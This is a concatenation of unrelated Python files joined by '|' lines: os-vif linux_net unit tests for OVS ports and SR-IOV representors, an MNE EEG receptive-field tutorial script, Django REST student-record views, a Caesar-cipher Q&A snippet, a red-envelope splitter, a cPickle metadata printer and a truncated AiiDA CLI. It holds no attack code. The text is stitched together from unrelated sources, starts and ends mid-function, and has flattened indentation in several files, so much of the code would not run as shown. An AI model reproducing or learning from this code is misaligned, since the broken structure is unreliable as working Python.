mock_vsctl, mock_ovs_supports_mtu_requests):
mock_ovs_supports_mtu_requests.return_value = True
linux_net.create_ovs_vif_port(
'fake-bridge',
'fake-dev', 'fake-iface-id', 'fake-mac',
"fake-instance-uuid", mtu=1500,
interface_type=constants.OVS_VHOSTUSER_CLIENT_INTERFACE_TYPE,
vhost_server_path="/fake/path")
mock_create_cmd.assert_called_once_with('fake-bridge',
'fake-dev', 'fake-iface-id', 'fake-mac',
"fake-instance-uuid",
constants.OVS_VHOSTUSER_CLIENT_INTERFACE_TYPE,
"/fake/path")
self.assertFalse(mock_set_device_mtu.called)
self.assertTrue(mock_vsctl.called)
@mock.patch.object(linux_net, '_ovs_supports_mtu_requests')
@mock.patch.object(linux_net, '_ovs_vsctl')
@mock.patch.object(linux_net, '_create_ovs_vif_cmd')
@mock.patch.object(linux_net, '_set_device_mtu')
def test_ovs_vif_port_with_no_mtu(self, mock_set_device_mtu,
mock_create_cmd, mock_vsctl,
mock_ovs_supports_mtu_requests):
mock_ovs_supports_mtu_requests.return_value = True
linux_net.create_ovs_vif_port(
'fake-bridge',
'fake-dev', 'fake-iface-id', 'fake-mac',
"fake-instance-uuid")
mock_create_cmd.assert_called_once_with('fake-bridge',
'fake-dev', 'fake-iface-id', 'fake-mac',
"fake-instance-uuid", None, None)
self.assertFalse(mock_set_device_mtu.called)
self.assertTrue(mock_vsctl.called)
@mock.patch.object(linux_net, '_ovs_supports_mtu_requests')
@mock.patch.object(linux_net, '_set_mtu_request')
@mock.patch.object(linux_net, '_ovs_vsctl')
@mock.patch.object(linux_net, '_create_ovs_vif_cmd',
return_value='ovs_command')
@mock.patch.object(linux_net, '_set_device_mtu')
def test_ovs_vif_port_with_timeout(self, mock_set_device_mtu,
mock_create_cmd, mock_vsctl,
mock_set_mtu_request,
mock_ovs_supports_mtu_requests):
mock_ovs_supports_mtu_requests.return_value = True
linux_net.create_ovs_vif_port(
'fake-bridge',
'fake-dev', 'fake-iface-id', 'fake-mac',
"fake-instance-uuid", ovsdb_connection=None,
timeout=42)
self.assertTrue(mock_create_cmd.called)
self.assertFalse(mock_set_device_mtu.called)
mock_vsctl.assert_called_with('ovs_command', ovsdb_connection=None,
timeout=42)
@mock.patch.object(linux_net, '_ovs_supports_mtu_requests')
@mock.patch.object(linux_net, '_set_mtu_request')
@mock.patch.object(linux_net, '_ovs_vsctl')
@mock.patch.object(linux_net, '_create_ovs_vif_cmd',
return_value='ovs_command')
@mock.patch.object(linux_net, '_set_device_mtu')
def test_ovs_vif_port_with_no_timeout(self, mock_set_device_mtu,
mock_create_cmd, mock_vsctl,
mock_set_mtu_request,
mock_ovs_supports_mtu_requests):
mock_ovs_supports_mtu_requests.return_value = True
linux_net.create_ovs_vif_port(
'fake-bridge',
'fake-dev', 'fake-iface-id', 'fake-mac',
"fake-instance-uuid")
self.assertTrue(mock_create_cmd.called)
self.assertFalse(mock_set_device_mtu.called)
mock_vsctl.assert_called_with('ovs_command', ovsdb_connection=None,
timeout=None)
@mock.patch.object(linux_net, '_ovs_supports_mtu_requests')
@mock.patch.object(linux_net, '_set_mtu_request')
@mock.patch.object(linux_net, '_ovs_vsctl')
@mock.patch.object(linux_net, '_create_ovs_vif_cmd',
return_value='ovs_command')
@mock.patch.object(linux_net, '_set_device_mtu')
def test_ovs_vif_port_with_ovsdb_connection(self, mock_set_device_mtu,
mock_create_cmd, mock_vsctl,
mock_set_mtu_request,
mock_ovs_supports_mtu_requests):
mock_ovs_supports_mtu_requests.return_value = True
linux_net.create_ovs_vif_port(
'fake-bridge',
'fake-dev', 'fake-iface-id', 'fake-mac',
"fake-instance-uuid", ovsdb_connection='tcp:127.0.0.1:6640',
timeout=42)
self.assertTrue(mock_create_cmd.called)
self.assertFalse(mock_set_device_mtu.called)
mock_vsctl.assert_called_with('ovs_command',
ovsdb_connection='tcp:127.0.0.1:6640',
timeout=42)
@mock.patch.object(processutils, "execute")
def test_ovs_vsctl(self, mock_execute):
args = ['fake-args', 42]
ovsdb_connection = 'tcp:127.0.0.1:6640'
timeout = 42
linux_net._ovs_vsctl(args)
linux_net._ovs_vsctl(args, ovsdb_connection=ovsdb_connection,
timeout=timeout)
mock_execute.assert_has_calls([
mock.call('ovs-vsctl', *args),
mock.call('ovs-vsctl', '--timeout=%s' % timeout,
'--db=%s' % ovsdb_connection, *args)])
@mock.patch.object(linux_net, '_ovs_vsctl')
def test_set_mtu_request(self, mock_vsctl):
dev = 'fake-dev'
mtu = 'fake-mtu'
ovsdb_connection = None
timeout = 120
linux_net._set_mtu_request(dev, mtu, ovsdb_connection=ovsdb_connection,
timeout=timeout)
args = ['--', 'set', 'interface', dev,
'mtu_request=%s' % mtu]
mock_vsctl.assert_called_with(args, ovsdb_connection=ovsdb_connection,
timeout=timeout)
@mock.patch.object(linux_net, '_delete_net_dev')
@mock.patch.object(linux_net, '_ovs_vsctl')
def test_delete_ovs_vif_port_delete_netdev(
self, mock_vsctl, mock_delete_net_dev):
bridge = 'fake-bridge'
dev = 'fake-dev'
ovsdb_connection = None
timeout = 120
linux_net.delete_ovs_vif_port(bridge, dev,
ovsdb_connection=ovsdb_connection,
timeout=timeout)
args = ['--', '--if-exists', 'del-port', bridge, dev]
mock_vsctl.assert_called_with(args, ovsdb_connection=ovsdb_connection,
timeout=timeout)
mock_delete_net_dev.assert_called()
@mock.patch.object(linux_net, '_delete_net_dev')
@mock.patch.object(linux_net, '_ovs_vsctl')
def test_delete_ovs_vif_port(self, mock_vsctl, mock_delete_net_dev):
bridge = 'fake-bridge'
dev = 'fake-dev'
ovsdb_connection = None
timeout = 120
linux_net.delete_ovs_vif_port(
bridge, dev, ovsdb_connection=ovsdb_connection, timeout=timeout,
delete_netdev=False)
args = ['--', '--if-exists', 'del-port', bridge, dev]
mock_vsctl.assert_called_with(args, ovsdb_connection=ovsdb_connection,
timeout=timeout)
mock_delete_net_dev.assert_not_called()
@mock.patch.object(linux_net, '_ovs_vsctl')
def test_ovs_supports_mtu_requests(self, mock_vsctl):
args = ['--columns=mtu_request', 'list', 'interface']
ovsdb_connection = None
timeout = 120
msg = 'ovs-vsctl: Interface does not contain' + \
' a column whose name matches "mtu_request"'
mock_vsctl.return_value = (None, msg)
result = linux_net._ovs_supports_mtu_requests(
ovsdb_connection=ovsdb_connection,
timeout=timeout)
mock_vsctl.assert_called_with(args, ovsdb_connection=ovsdb_connection,
timeout=timeout)
self.assertFalse(result)
mock_vsctl.return_value = (None, None)
result = linux_net._ovs_supports_mtu_requests(
ovsdb_connection=ovsdb_connection,
timeout=timeout)
mock_vsctl.assert_called_with(args, ovsdb_connection=ovsdb_connection,
timeout=timeout)
self.assertTrue(result)
@mock.patch('six.moves.builtins.open')
@mock.patch.object(os.path, 'isfile')
def test_is_switchdev_ioerror(self, mock_isfile, mock_open):
mock_isfile.side_effect = [True]
mock_open.return_value.__enter__ = lambda s: s
readline_mock = mock_open.return_value.readline
readline_mock.side_effect = (
[IOError()])
test_switchdev = linux_net._is_switchdev('pf_ifname')
self.assertEqual(test_switchdev, False)
@mock.patch('six.moves.builtins.open')
@mock.patch.object(os.path, 'isfile')
def test_is_switchdev_empty(self, mock_isfile, mock_open):
mock_isfile.side_effect = [True]
mock_open.return_value.__enter__ = lambda s: s
readline_mock = mock_open.return_value.readline
readline_mock.side_effect = (
[''])
open_calls = (
[mock.call('/sys/class/net/pf_ifname/phys_switch_id', 'r'),
mock.call().readline(),
mock.call().__exit__(None, None, None)])
test_switchdev = linux_net._is_switchdev('pf_ifname')
mock_open.assert_has_calls(open_calls)
self.assertEqual(test_switchdev, False)
@mock.patch('six.moves.builtins.open')
@mock.patch.object(os.path, 'isfile')
def test_is_switchdev_positive(self, mock_isfile, mock_open):
mock_isfile.side_effect = [True]
mock_open.return_value.__enter__ = lambda s: s
readline_mock = mock_open.return_value.readline
readline_mock.side_effect = (
['pf_sw_id'])
open_calls = (
[mock.call('/sys/class/net/pf_ifname/phys_switch_id', 'r'),
mock.call().readline(),
mock.call().__exit__(None, None, None)])
test_switchdev = linux_net._is_switchdev('pf_ifname')
mock_open.assert_has_calls(open_calls)
self.assertEqual(test_switchdev, True)
def test_parse_vf_number(self):
self.assertEqual(linux_net._parse_vf_number("0"), "0")
self.assertEqual(linux_net._parse_vf_number("pf13vf42"), "42")
self.assertEqual(linux_net._parse_vf_number("VF19@PF13"), "19")
self.assertIsNone(linux_net._parse_vf_number("p7"))
self.assertIsNone(linux_net._parse_vf_number("pf31"))
self.assertIsNone(linux_net._parse_vf_number("g4rbl3d"))
def test_parse_pf_number(self):
self.assertIsNone(linux_net._parse_pf_number("0"))
self.assertEqual(linux_net._parse_pf_number("pf13vf42"), "13")
self.assertEqual(linux_net._parse_pf_number("VF19@PF13"), "13")
self.assertIsNone(linux_net._parse_pf_number("p7"))
self.assertEqual(linux_net._parse_pf_number("pf31"), "31")
self.assertIsNone(linux_net._parse_pf_number("g4rbl3d"))
@mock.patch('six.moves.builtins.open')
@mock.patch.object(os.path, 'isfile')
@mock.patch.object(os, 'listdir')
@mock.patch.object(linux_net, "get_function_by_ifname")
def test_get_representor_port(self, mock_get_function_by_ifname,
mock_listdir, mock_isfile, mock_open):
mock_listdir.return_value = [
'pf_ifname', 'rep_vf_1', 'rep_vf_2'
]
mock_isfile.side_effect = [True, True]
mock_open.return_value.__enter__ = lambda s: s
readline_mock = mock_open.return_value.readline
readline_mock.side_effect = (
['pf_sw_id', 'pf_sw_id', '1', 'pf_sw_id', 'pf0vf2'])
# PCI IDs mocked:
# PF0: 0000:0a:00.0
# PF0VF1: 0000:0a:02.1 PF0VF2: 0000:0a:02.2
mock_get_function_by_ifname.side_effect = (
[("0000:0a:00.0", True),
("0000:0a:02.1", False),
("0000:0a:02.2", False), ("0000:0a:00.0", True)])
open_calls = (
[mock.call('/sys/class/net/pf_ifname/phys_switch_id', 'r'),
mock.call().readline(),
mock.call().__exit__(None, None, None),
mock.call('/sys/class/net/rep_vf_1/phys_switch_id', 'r'),
mock.call().readline(),
mock.call().__exit__(None, None, None),
mock.call('/sys/class/net/rep_vf_1/phys_port_name', 'r'),
mock.call().readline(),
mock.call().__exit__(None, None, None),
mock.call('/sys/class/net/rep_vf_2/phys_switch_id', 'r'),
mock.call().readline(),
mock.call().__exit__(None, None, None),
mock.call('/sys/class/net/rep_vf_2/phys_port_name', 'r'),
mock.call().readline(),
mock.call().__exit__(None, None, None)])
ifname = linux_net.get_representor_port('pf_ifname', '2')
mock_open.assert_has_calls(open_calls)
self.assertEqual('rep_vf_2', ifname)
@mock.patch('six.moves.builtins.open')
@mock.patch.object(os.path, 'isfile')
@mock.patch.object(os, 'listdir')
@mock.patch.object(linux_net, "get_function_by_ifname")
def test_get_representor_port_2_pfs(
self, mock_get_function_by_ifname, mock_listdir, mock_isfile,
mock_open):
mock_listdir.return_value = [
'pf_ifname1', 'pf_ifname2', 'rep_pf1_vf_1', 'rep_pf1_vf_2',
'rep_pf2_vf_1', 'rep_pf2_vf_2',
]
mock_isfile.side_effect = [True, True, True, True]
mock_open.return_value.__enter__ = lambda s: s
readline_mock = mock_open.return_value.readline
readline_mock.side_effect = (
['pf_sw_id',
'pf_sw_id', 'VF1@PF1', 'pf_sw_id', 'vf2@pf1',
'pf_sw_id', 'pf2vf1', 'pf_sw_id', 'pf2vf2'])
# PCI IDs mocked:
# PF1: 0000:0a:00.1 PF2: 0000:0a:00.2
# PF1VF1: 0000:0a:02.1 PF1VF2: 0000:0a:02.2
# PF2VF1: 0000:0a:04.1 PF2VF2: 0000:0a:04.2
mock_get_function_by_ifname.side_effect = (
[("0000:0a:00.1", True), ("0000:0a:00.2", True),
("0000:0a:02.1", False), ("0000:0a:00.2", True),
("0000:0a:02.2", False), ("0000:0a:00.2", True),
("0000:0a:04.1", False), ("0000:0a:00.2", True),
("0000:0a:04.2", False), ("0000:0a:00.2", True)])
ifname = linux_net.get_representor_port('pf_ifname2', '2')
self.assertEqual('rep_pf2_vf_2', ifname)
@mock.patch('six.moves.builtins.open')
@mock.patch.object(os.path, 'isfile')
@mock.patch.object(os, 'listdir')
@mock.patch.object(linux_net, "get_function_by_ifname")
def test_get_representor_port_not_found(
self, mock_get_function_by_ifname, mock_listdir, mock_isfile,
mock_open):
mock_listdir.return_value = [
'pf_ifname', 'rep_vf_1', 'rep_vf_2'
]
mock_isfile.side_effect = [True, True]
mock_open.return_value.__enter__ = lambda s: s
readline_mock = mock_open.return_value.readline
readline_mock.side_effect = (
['pf_sw_id', 'pf_sw_id', '1', 'pf_sw_id', '2'])
# PCI IDs mocked:
# PF0: 0000:0a:00.0
# PF0VF1: 0000:0a:02.1 PF0VF2: 0000:0a:02.2
mock_get_function_by_ifname.side_effect = (
[("0000:0a:00.0", True),
("0000:0a:02.1", False),
("0000:0a:02.2", False)])
self.assertRaises(
exception.RepresentorNotFound,
linux_net.get_representor_port,
            'pf_ifname', '3')
@mock.patch('six.moves.builtins.open')
@mock.patch.object(os.path, 'isfile')
@mock.patch.object(os, 'listdir')
@mock.patch.object(linux_net, "get_function_by_ifname")
def test_get_representor_port_exception_io_error(
self, mock_get_function_by_ifname, mock_listdir, mock_isfile,
mock_open):
mock_listdir.return_value = [
'pf_ifname', 'rep_vf_1', 'rep_vf_2'
]
mock_isfile.side_effect = [True, True]
mock_open.return_value.__enter__ = lambda s: s
readline_mock = mock_open.return_value.readline
readline_mock.side_effect = (
['pf_sw_id', 'pf_sw_id', IOError(), 'pf_sw_id', '2'])
# PCI IDs mocked:
# PF0: 0000:0a:00.0
# PF0VF1: 0000:0a:02.1 PF0VF2: 0000:0a:02.2
mock_get_function_by_ifname.side_effect = (
[("0000:0a:00.0", True),
("0000:0a:02.1", False),
("0000:0a:02.2", False), ("0000:0a:00.0", True)])
self.assertRaises(
exception.RepresentorNotFound,
linux_net.get_representor_port,
'pf_ifname', '3')
@mock.patch('six.moves.builtins.open')
@mock.patch.object(os.path, 'isfile')
@mock.patch.object(os, 'listdir')
@mock.patch.object(linux_net, "get_function_by_ifname")
def test_get_representor_port_exception_value_error(
self, mock_get_function_by_ifname, mock_listdir, mock_isfile,
mock_open):
mock_listdir.return_value = [
'pf_ifname', 'rep_vf_1', 'rep_vf_2'
]
mock_isfile.side_effect = [True, True]
mock_open.return_value.__enter__ = lambda s: s
readline_mock = mock_open.return_value.readline
readline_mock.side_effect = (
['pf_sw_id', 'pf_sw_id', '1', 'pf_sw_id', 'a'])
# PCI IDs mocked:
# PF0: 0000:0a:00.0
# PF0VF1: 0000:0a:02.1 PF0VF2: 0000:0a:02.2
mock_get_function_by_ifname.side_effect = (
[("0000:0a:00.0", True),
("0000:0a:02.1", False),
("0000:0a:02.2", False)])
self.assertRaises(
exception.RepresentorNotFound,
linux_net.get_representor_port,
'pf_ifname', '3')
@mock.patch('six.moves.builtins.open')
@mock.patch.object(os.path, 'isfile')
@mock.patch.object(os, 'listdir')
    def test_physical_function_interface_name(
self, mock_listdir, mock_isfile, mock_open):
mock_listdir.return_value = ['foo', 'bar']
mock_isfile.side_effect = [True, True]
mock_open.return_value.__enter__ = lambda s: s
readline_mock = mock_open.return_value.readline
readline_mock.side_effect = (
['', 'valid_switch'])
ifname = linux_net.get_ifname_by_pci_address(
'0000:00:00.1', pf_interface=True, switchdev=False)
self.assertEqual(ifname, 'foo')
@mock.patch('six.moves.builtins.open')
@mock.patch.object(os.path, 'isfile')
@mock.patch.object(os, 'listdir')
    def test_physical_function_interface_name_with_switchdev(
self, mock_listdir, mock_isfile, mock_open):
mock_listdir.return_value = ['foo', 'bar']
mock_isfile.side_effect = [True, True]
mock_open.return_value.__enter__ = lambda s: s
readline_mock = mock_open.return_value.readline
readline_mock.side_effect = (
['', 'valid_switch'])
ifname = linux_net.get_ifname_by_pci_address(
'0000:00:00.1', pf_interface=True, switchdev=True)
self.assertEqual(ifname, 'bar')
@mock.patch.object(os, 'listdir')
def test_get_ifname_by_pci_address_exception(self, mock_listdir):
mock_listdir.side_effect = OSError('No such file or directory')
self.assertRaises(
exception.PciDeviceNotFoundById,
linux_net.get_ifname_by_pci_address,
'0000:00:00.1'
)
@mock.patch.object(os, 'readlink')
@mock.patch.object(glob, 'iglob')
def test_vf_number_found(self, mock_iglob, mock_readlink):
mock_iglob.return_value = [
'/sys/bus/pci/devices/0000:00:00.1/physfn/virtfn3',
]
mock_readlink.return_value = '../../0000:00:00.1'
vf_num = linux_net.get_vf_num_by_pci_address('0000:00:00.1')
self.assertEqual(vf_num, '3')
@mock.patch.object(os, 'readlink')
@mock.patch.object(glob, 'iglob')
def test_vf_number_not_found(self, mock_iglob, mock_readlink):
mock_iglob.return_value = [
'/sys/bus/pci/devices/0000:00:00.1/physfn/virtfn3',
]
mock_readlink.return_value = '../../0000:00:00.2'
self.assertRaises(
exception.PciDeviceNotFoundById,
linux_net.get_vf_num_by_pci_address,
'0000:00:00.1'
)
@mock.patch.object(os, 'readlink')
@mock.patch.object(glob, 'iglob')
def test_get_vf_num_by_pci_address_exception(
self, mock_iglob, mock_readlink):
mock_iglob.return_value = [
'/sys/bus/pci/devices/0000:00:00.1/physfn/virtfn3',
]
mock_readlink.side_effect = OSError('No such file or directory')
self.assertRaises(
exception.PciDeviceNotFoundById,
linux_net.get_vf_num_by_pci_address,
'0000:00:00.1'
)
|
# Fagprojekt
# mTRF in Python
# Load dependencies
import numpy as np
import matplotlib.pyplot as plt
from scipy.io import loadmat
from os.path import join
import mne
from mne.decoding import ReceptiveField
from sklearn.model_selection import KFold
from sklearn.preprocessing import scale
# The following is adapted from the mTRF example at mne.tools #
#######################################################
## Load data from publication
path = mne.datasets.mtrf.data_path()
decim = 2
data_mne = loadmat(join(path, "speech_data.mat"))
raw = data_mne["EEG"].T
speech = data_mne["envelope"].T
sfreq = float(data_mne["Fs"])
sfreq /= decim
speech = mne.filter.resample(speech, down = decim, npad = "auto")
raw = mne.filter.resample(raw, down = decim, npad = "auto")
# Read in channel positions and create MNE object from raw data
montage = mne.channels.make_standard_montage("biosemi128")
# Newer MNE releases removed the ``montage`` argument from create_info();
# set_montage() is the supported way to attach channel positions.
info = mne.create_info(montage.ch_names, sfreq, "eeg").set_montage(montage)
raw = mne.io.RawArray(raw, info)
n_channels = len(raw.ch_names)
# Plot a sample of brain and stimulus activity
fig, ax = plt.subplots()
lns = ax.plot(scale(raw[:, :800][0].T), color = "k", alpha = .1)
ln1 = ax.plot(scale(speech[0, :800]), color = "r", lw = 2)
ax.legend([lns[0], ln1[0]], ["EEG", "Speech Envelope"], frameon = False)
ax.set(title = "Sample activity", xlabel = "Time (s)")
mne.viz.tight_layout()
#%%
## Create and fit a receptive field model
# Define the delays that we will use in the receptive field
tmin, tmax = -.2, .4
# Initialize the model
rf = ReceptiveField(tmin, tmax, sfreq, feature_names = ["envelope"],
estimator = 1.,
scoring = "corrcoef")
# We'll have (tmax - tmin) * sfreq delays
# and an extra 2 delays since we are inclusive on the beginning / end index
n_delays = int((tmax - tmin) * sfreq) + 2
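# Worked through (a sketch, assuming the dataset's 128 Hz recording, so
# sfreq = 64 after decimation): int((0.4 - (-0.2)) * 64) + 2 = 38 + 2 = 40.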
n_splits = 3
cv = KFold(n_splits)
# Prepare model data (make time the first dimension)
speech = speech.T
Y, _ = raw[:] # Output for the model
Y = Y.T
# Iterate through splits, fit the model, and predict/test on held-out data
coefs = np.zeros((n_splits, n_channels, n_delays))
scores = np.zeros((n_splits, n_channels))
for ii, (train, test) in enumerate(cv.split(speech)):
print("split %s /%s" % (ii + 1, n_splits))
rf.fit(speech[train], Y[train])
scores[ii] = rf.score(speech[test], Y[test])
# coef_ is shape (n_outputs, n_features, n_delays). We only have 1 feature
coefs[ii] = rf.coef_[:, 0, :]
times = rf.delays_ / float(rf.sfreq)
# Average scores and coefficients across CV splits
mean_coefs = coefs.mean(axis = 0)
mean_scores = scores.mean(axis = 0)
# Plot mean prediction scores across all channels
fig, ax = plt.subplots()
ix_chs = np.arange(n_channels)
ax.plot(ix_chs, mean_scores)
ax.axhline(0, ls = "--", color = "r")
ax.set(title = "Mean prediction score", xlabel = "Channel", ylabel = "Score ($r$)")
mne.viz.tight_layout()
#%%
## Investigate model coefficients
# Plot mean coefficients across all time delays / channels
time_plot = 0.180 # For highlighting a specific time
fig, ax = plt.subplots(figsize=(4, 8))
max_coef = mean_coefs.max()
ax.pcolormesh(times, ix_chs, mean_coefs, cmap = "RdBu_r",
vmin = -max_coef, vmax = max_coef,
shading = "gouraud")
ax.axvline(time_plot, ls = "--", color = "k", lw = 2)
ax.set(xlabel = "Delay (s)", ylabel = "Channel", title = "Mean model\nCoefficients",
xlim = times[[0, -1]], ylim = [len(ix_chs) - 1, 0],
xticks = np.arange(tmin, tmax + .2, .2))
plt.setp(ax.get_xticklabels(), rotation = 45)
mne.viz.tight_layout()
# Make a topographic map of coefficients for a given delay
ix_plot = np.argmin(np.abs(time_plot - times))
fig, ax = plt.subplots()
mne.viz.plot_topomap(mean_coefs[:, ix_plot], pos = info, axes = ax, show = False,
vmin = -max_coef, vmax = max_coef)
ax.set(title = "Topomap of model coefficients\nfor delay %s" % time_plot)
mne.viz.tight_layout()
#%%
## Create and fit a stimulus reconstruction model
# We use the same lags as in [1]. Negative lags now index the relationship
# between the neural response and the speech envelope earlier in time, whereas
# positive lags would index how a unit change in the amplitude of the EEG would
# affect later stimulus activity (obviously this should have an amplitude of
# zero).
tmin, tmax = -.2, 0.
# Initialize the model. Here the features are the EEG data. We also specify
# ``patterns=True`` to compute inverse-transformed coefficients during model
# fitting. We'll use a ridge regression estimator with an
# alpha value similar to the publication.
sr = ReceptiveField(tmin, tmax, sfreq, feature_names = raw.ch_names,
estimator = 1e4, scoring = "corrcoef", patterns = True)
# We'll have (tmax - tmin) * sfreq delays
# and an extra 2 delays since we are inclusive on the beginning / end index
n_delays = int((tmax - tmin) * sfreq) + 2
n_splits = 3
cv = KFold(n_splits)
# Iterate through splits, fit the model, and predict/test on held-out data
coefs = np.zeros((n_splits, n_channels, n_delays))
patterns = coefs.copy()
scores = np.zeros((n_splits,))
for ii, (train, test) in enumerate(cv.split(speech)):
print("split %s / %s" % (ii + 1, n_splits))
sr.fit(Y[train], speech[train])
scores[ii] = sr.score(Y[test], speech[test])[0]
# coef_ is shape (n_outputs, n_features, n_delays). We have 128 features
coefs[ii] = sr.coef_[0, :, :]
patterns[ii] = sr.patterns_[0, :, :]
times = sr.delays_ / float(sr.sfreq)
# Average scores and coefficients across CV splits
mean_coefs = coefs.mean(axis = 0)
mean_patterns = patterns.mean(axis = 0)
mean_scores = scores.mean(axis = 0)
max_coef = np.abs(mean_coefs).max()
max_patterns = np.abs(mean_patterns).max()
#%%
## Visualize stimulus reconstruction
y_pred = sr.predict(Y[test])
time = np.linspace(0, 5., 5 * int(sfreq))  # five seconds of plotted samples
fig, ax = plt.subplots(figsize = (8, 4))
ln_env = ax.plot(time, speech[test][sr.valid_samples_][:int(5 * sfreq)],
                 color = "grey", lw = 2, ls = "--")
ln_rec = ax.plot(time, y_pred[sr.valid_samples_][:int(5 * sfreq)], color = "r", lw = 2)
# Use this figure's own handles; ``lns``/``ln1`` belong to the first plot and
# would give this legend the wrong line styles.
ax.legend([ln_env[0], ln_rec[0]], ["Envelope", "Reconstruction"], frameon = False)
ax.set(title = "Stimulus reconstruction")
ax.set_xlabel("Time (s)")
mne.viz.tight_layout()
#%%
## Investigate model coefficients
time_plot = (-.140, -.125) # To average between two time points
ix_plot = np.arange(np.argmin(np.abs(time_plot[0] - times)),
np.argmin(np.abs(time_plot[1] - times)))
fig, ax = plt.subplots(1, 2)
mne.viz.plot_topomap(np.mean(mean_coefs[:, ix_plot], axis = 1),
pos = info, axes = ax[0], show = False,
vmin = -max_coef, vmax = max_coef)
ax[0].set(title = "Model coefficients\nbetween delays %s and %s" % (time_plot[0], time_plot[1]))
mne.viz.plot_topomap(np.mean(mean_patterns[:, ix_plot], axis = 1),
pos = info, axes = ax[1],
show = False, vmin = -max_patterns, vmax = max_patterns)
ax[1].set(title = "Inverse_transformed coefficients\nbetween delays %s and %s" % (time_plot[0], time_plot[1]))
mne.viz.tight_layout()
plt.show()
|
from django.shortcuts import render
from rest_framework.decorators import api_view
from rest_framework.response import Response
import sys
#from django.http import JsonResponse
from .serializers import StudentrecordsSerializer
from .models import Studentrecord
@api_view(['GET'])
def apiInfo(request):
api_urls = {
'ViewAll':'/students-records/view-all/',
'ViewOne':'/students-records/view/<rollno>',
'Create':'/students-records/create/',
'Update':'/students-records/update/<str:Id>',
'Delete':'/students-records/delete/<str:Id>',
}
return Response(api_urls)
@api_view(['GET'])
def viewallrecords(request):
students = Studentrecord.objects.all().order_by('-Percentage')
serializer = StudentrecordsSerializer(students, many=True)
return Response(serializer.data)
@api_view(['GET'])
def viewStudentrecord(request, rollno):
students = Studentrecord.objects.get(RollNo=rollno)
serializer = StudentrecordsSerializer(students, many=False)
return Response(serializer.data)
@api_view(['GET'])
def viewsortbystudentrecord(request, field):
students = Studentrecord.objects.all().order_by(field)
serializer = StudentrecordsSerializer(students, many=True)
return Response(serializer.data)
@api_view(['POST'])
def createnewrecord(request):
serializer = StudentrecordsSerializer(data=request.data)
if serializer.is_valid():
serializer.save()
return Response(serializer.data)
else:
error={"Error":"NOT VALID"}
return Response(error)
@api_view(['POST'])
def updatestudentrecord(request, pk):
record = Studentrecord.objects.get(Id=pk)
serializer = StudentrecordsSerializer(instance=record, data=request.data)
if serializer.is_valid():
serializer.save()
return Response(serializer.data)
else:
error={"Error":"Some Error Occurred"}
return Response(error)
@api_view(['POST'])
def deletestudentrecord(request, pk):
obj = Studentrecord.objects.get(Id=pk)
obj.delete()
    return Response('Item successfully deleted!')
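# Hypothetical client calls (assumes Django's dev server on 127.0.0.1:8000 and
# the routes listed in apiInfo; not part of the original module):
# import requests
# requests.post('http://127.0.0.1:8000/students-records/create/',
#               data={'RollNo': 1, 'Percentage': 92.5})
# requests.get('http://127.0.0.1:8000/students-records/view/1').json()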
|
def encryptionMode(encryptionAlgorithm):
modeInput = input("What would you like to do? ")
return modeInput
def shiftSelect(shift):
    shiftInput = -26  # initialize shift input to an invalid value
while shiftInput > 25 or shiftInput < -25:
        # I cast here instead since, this way, the conversion happens once per prompt.
        shiftInput = int(input("What is your shift? "))
        # I want it to restart from the top of this function if these conditions are met.
        # If this condition is not met, then it returns the shift.
        # I will use this in the function that is specific for each algorithm.
#Solution:
#You want to put it in a loop. You could do this a variety of ways
#We need to know more about what you want to return. I am going to assume
#that you want to do something with this function after the shiftinput is
#taken
if shiftInput > 25 or shiftInput < -25:
print("Try Again")
print("Out of loop") #Just to show you have exited loop
#You have to actually call the function
shiftSelect(9)
#One other question, should I use a different class for each algorithm?
#So depending on the requested algorithm and the requested shift (if applicable)
#Then it would run a specific class etc. (Is that the best use of the class?)
#Comment:
#Note that you would not create a class for each encryption algorithm.
#What you might do is create a Message class that contains a string as
#a field that stores the message. Then you would have the encryption
#algorithms as methods (behaviours) that you apply.
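#A minimal sketch of that suggestion (hypothetical names, not from the
#original thread): a Message class holding the text, with each cipher as a method.
class Message:
    def __init__(self, text):
        self.text = text
    def caesar_encrypt(self, shift):
        # Shift alphabetic characters by `shift`, wrapping around the alphabet.
        result = []
        for ch in self.text:
            if ch.isalpha():
                base = ord('A') if ch.isupper() else ord('a')
                result.append(chr((ord(ch) - base + shift) % 26 + base))
            else:
                result.append(ch)
        return ''.join(result)
    def caesar_decrypt(self, shift):
        return self.caesar_encrypt(-shift)
#Example: Message("abc").caesar_encrypt(2) == "cde"
|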
#! /usr/bin/env python
# -*- coding: utf-8 -*-
# File Name: 练习4_红包 (Exercise 4: Red Envelope)
# Description :
# Author : SanYapeng
# date: 2019-05-01
# Change Activity: 2019-05-01:
import random
"""
基本单位 0.01 获取到的金额必须大于这个数,才能生效
金额和红包个数整除为基本数,那么金额就位0.01
第一个红包金额随机,但是必须得小于输入金额
"""
import random
# summoney=input("please input the amount of money:")
# divide_n=input("divide into?:")
def hongbao(money, n):
    """Split `money` into `n` random red-envelope amounts that sum to the total."""
    amounts = []
    remaining = money  # money left to hand out
    for i in range(1, n):
        # Draw up to twice the fair share of what remains, so the expected
        # amount stays money / n for every position in the queue.
        get_money = random.randint(0, int(2 * remaining / (n - i + 1)))
        print('id[%s] got money %s' % (i, get_money))
        amounts.append(get_money)
        remaining -= get_money
    # The last person takes everything that is left.
    print('id[%s] got money %s' % (n, remaining))
    amounts.append(remaining)
    return amounts
hongbao(100, 10)
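# A quick sanity check (hypothetical, not in the original): with a fixed seed
# the split is reproducible, and the amounts always sum back to the total.
random.seed(0)
assert sum(hongbao(100, 10)) == 100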
|
#!/usr/bin/env python
import cPickle, time, os, magic
def unpickler():
    # Load the pickled list of file paths (binary mode keeps pickle happy).
    unpic_file = open('myPickle', 'rb')
    temp = cPickle.load(unpic_file)
    unpic_file.close()
    printer(temp)
    return temp
def printer(tmp_file):
print '%-50s%-30s%-30s%-10s%-15s\n'%('File',
'Created Time',
'Modified Time',
'File Size',
'File Info')
    for path in tmp_file:
        meta_data = magic.from_file(path)
        created_time = time.ctime(os.path.getctime(path))
        modified_time = time.ctime(os.path.getmtime(path))
        file_size = os.path.getsize(path)
        print '%-50s%-30s%-30s%-10s%-15s' % (path,
                                             created_time,
                                             modified_time,
                                             file_size,
                                             meta_data)
|
#!/usr/bin/env runaiida
# -*- coding: utf-8 -*-
import os
import click
@click.command('cli')
@click.argument('codelabel')
@click.option('--submit', is_flag=True, help='Actually submit calculation')
def main(codelabel, submit):
"""Command line interface for testing and submitting calculations.
This script extends submit.py, adding flexibility in the selected code/computer.
Run './cli.py --help' to see options.
"""
code = Code.get_from_string(codelabel)
# set up calculation
calc = code.new_calc()
calc.label = "compute rips from distance matrix"
